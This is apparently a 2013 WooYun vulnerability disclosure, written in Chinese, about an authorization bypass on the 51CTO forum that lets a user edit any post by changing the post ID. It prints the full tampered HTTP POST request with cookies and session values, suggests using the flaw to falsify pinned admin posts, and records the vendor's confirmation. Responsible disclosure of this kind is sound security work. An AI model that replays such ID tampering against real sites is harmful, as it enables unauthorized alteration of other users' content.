漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-039027
漏洞标题:51cto技术圈绕过管理权限修改任意帖子
相关厂商:51CTO技术网站
漏洞作者: Hero
提交时间:2013-10-07 17:07
修复时间:2013-11-21 17:07
公开时间:2013-11-21 17:07
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-07: 细节已通知厂商并且等待厂商处理中
2013-10-08: 厂商已经确认,细节仅向厂商公开
2013-10-18: 细节向核心白帽子及相关领域专家公开
2013-10-28: 细节向普通白帽子公开
2013-11-07: 细节向实习白帽子公开
2013-11-21: 细节向公众公开
简要描述:
为何你会忽略反射xss~
详细说明:
先修改自己的帖子进行抓包
分析后得知248203 为帖子id
把抓到包的帖子ID修改下在发出去会有什么神奇的事情发生呢!
帖子ID16257
POST /group_index.php?do=bbsedit&tid=16257&sid=16257&gname=job&actions=edit&page=1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://g.51cto.com/group_index.php?do=bbsedit&tid=248203&sid=248203&gname=job&actions=edit&page=1
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: g.51cto.com
Content-Length: 116
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: pub_cookietime=2592000; pub_sauth1=UFQAUVxUBFUFDDsFWg9UBQUAPVVVCgQAUVEFVgM; pub_sauth2=fccd5d0d3876be02a16afdff25c361e5; Hm_lvt_f77ea1ecd95cb2a1bc65cbcb3aaba7d4=1379586266,1380821364; pgv_pvi=73427968; lastvisit=983%091381132952%09%2Fjs%2Fgcount.php%3Fgid%3D32; _ourplusFirstTime=2013-10-7-15-44-35; _ourplusReturnTime=2013-10-7-15-44-35; bdshare_firstime=1381132089437; Hm_lvt_b415ab0b61d6ef0fd39070a1cc06ec69=1381132133; __utma=48738928.181960997.1381132133.1381132133.1381132133.1; __utmb=48738928.1.10.1381132133; __utmz=48738928.1381132133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=2fb2511a0843972941d1905d2d9df8c7
huifutitle=hackertest&job=2&actions=edit&tid=16257&gid=32&sid=16257&diyclass=0&atc_contentp=test&Submit=%CC%E1%BD%BB
把包修改后发出去
Nice
要是加入人气旺的帖子,修改管理的置顶帖子发虚假信息,后果你懂的~
漏洞证明:
同上~
修复方案:
你们比我懂~
版权声明:转载请注明来源 Hero@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-10-08 17:06
厂商回复:
感谢提交漏洞,我们会尽快修改。
最新状态:
暂无